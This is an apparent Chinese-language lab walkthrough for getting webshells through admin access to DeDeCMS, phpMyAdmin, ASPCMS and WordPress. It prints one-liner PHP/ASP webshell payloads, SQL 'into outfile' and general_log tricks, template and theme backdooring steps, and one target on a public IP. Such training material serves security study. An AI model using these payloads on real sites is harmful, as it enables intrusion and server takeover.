DeDeCMS

環境搭建

傻瓜式安裝

漏洞一：通過文件管理器上傳WebShel

步驟?:訪問目標靶場其思路為 dedecms 后臺可以直接上傳任意文件，可以通過?件管理器上傳php文件獲取webshell

登陸網站后臺

步驟二：登陸到后臺點擊 【核心】 --》 【文件式管理器】 --》 【文件上傳】 將準備好的惡意代碼上傳

步驟三：訪問上傳成功后的文件

http://127.0.0.1/dedecms/uploads/1.php

漏洞二：修改模板文件拿WebShell

步驟?：與WPCMS類似，直接修改模板拿WebShell..點擊 【模板】 --》 【默認模板管理】 --》【index.htm】 --> 【修改】

進入后添加惡意代碼

步驟二：點擊 【勝成】 --》 【更新主頁HTML】 --》將主頁位置修改為【../index.php 】--》點擊 【生成靜態】 --》點擊 【更新主頁】 再次訪問站點首頁可發現變化

步驟三：訪問主頁，phpinfo更新成功

漏洞三：后臺任意命令執行拿WebShell

步驟一：點擊 【模塊】 --》 【廣告管理】 --》 【增加一個新廣告】 --》在 【廣告內容】 處添加一句話代碼--》點擊 【確定】

步驟二：點擊【代碼】--》在圖中顯示的路徑與站點進行拼接

http://127.0.0.1/dedecms/plus/ad_js.php?aid=1

步驟三：使用蟻劍測試連接

漏洞四：通過后臺sql命令執行拿webshell

步驟一：訪問系統---sql命令行工具---執行 select @@basedir，獲取mysql路徑，由此瑞測網站絕對路徑

猜測絕對路徑為E:/phpStudy/PHPTutorial/

步驟二：into outfile寫入一句話木馬

步驟三：使用蟻劍測試連接

PhPMyadmin

一.通過日志文件

1.sql語句模式

show global variables like '%general%';	  //查詢日志文件
set global general_log='on'; //日志保存狀態開啟;
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'; //修改日志的保存位置。
select '<?php eval($_POST[cmd]);?>';

在去查看一下確保開啟

修改存儲路徑

Ok修改成功

寫入木馬;去連接日志文件

2.圖形化界面

新建-->變量-->過濾

點擊編輯改成ON

然后再去sql語句那寫入

二.導入導出

select @@datadir   //判斷路徑
猜測web路徑
select "<?php @eval($_POST[cmd]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/333.php';

寫入后我們去連接

ASPCMS

訪問后臺文件并登錄

點擊到幻燈片設置里點擊保存，然后抓包

將數據包中的slideTextStatus 字段的值修改為我們的一句話木馬

1%25><%25Eval(Request (chr(65)))%25><%25

寫到了/config/AspCms_Config.asp 這個文件里

點擊放行

我們訪問 aspcms_config.asp 文件

訪問成功使用菜刀連接

獲得 shell

Wordperss

注冊賬號

登錄

漏洞一：后臺修改模板拿WebShell

步驟一：思路是修改其WP的模板寫入?句話木馬后門并訪問其文件即可GetShell；登陸WP后點擊 【Appearance】 -->author-bio.php

步驟二：在其模板中插入一句話木馬代碼..點擊 【Update File】 按鈕

<?php @eval($_POST[123]);?>

步驟三：訪問以下連接即可獲取WebShell

http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php

步驟四：嘗試蟻劍連接獲取webshell

漏洞二：上傳主題拿WebShell

步驟?：接著上?個環境使用...將帶有后門的文件加入到主題中并將主題壓縮為ZIP?件

先去下載一個免費模板

https://blog.csdn.net/m0_59768231/article/details/144777066?spm=1001.2014.3001.5502

解壓后打開第一個文件夾寫入一句話木馬

重新壓縮為一個.zip壓縮包

步驟二：找到網站上傳模板主題的位置

選中我們剛才重新壓縮好的文件

步驟三：訪問以下連接即可獲取WebShell

http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php

步驟四：嘗試蟻劍連接獲取webshell